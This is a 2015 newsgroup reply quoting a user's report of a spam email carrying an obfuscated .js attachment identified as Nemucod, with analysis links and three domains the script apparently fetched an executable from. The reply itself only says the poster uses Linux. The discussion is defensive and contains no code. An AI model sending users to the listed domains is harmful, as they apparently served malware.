On Wed, 02 Sep 2015 10:47:57 -0400, Virus Man wrote:

> I got a spam today to an account hosted by my residential ISP but
> operated by Hotmail (ie - Micro$haft).  The originating IP of the spam
> indicated that the infected host uses the same ISP that I do.
> 
> The payload was a zip-compressed obfuscated .js file, which was scanned
> here:
> 
> https://www.virustotal.com/en/file/
cabea50df557c862e39db28c4768435f3a730b5c6e6099db37dcd1fa6bc61ea0/
analysis/1441202201/
> 
> A unique name given to this malware seems to be "Nemucod"
> 
> A de-obfuscated display of this file can be found here:
> 
> http://wepawet.iseclab.org/view.php?
hash=ed7c3a57a60f35e14d78a268bb4ff3e7&type=js
> 
> "No exploits were identified"
> 
> Perhaps not - but the code obviously directs the reader to download an
> executable from one of these domains:
> 
>    etqy.com ihaveavoice2.com riggst.com
> 
> Can anyone here explain how, or under what conditions, this
> zip-compressed .js file was intended or would have been executed on a
> recipient's machine by performing a single click-action on the payload
> attachment link?
> 
> Can anyone explain Macro$hit's failure to scan and detect this file as a
> malicious attachment by their hotmail server?

Don't know. I use Linux so I don't have to care.
--- NewsGate v1.0 gamma 2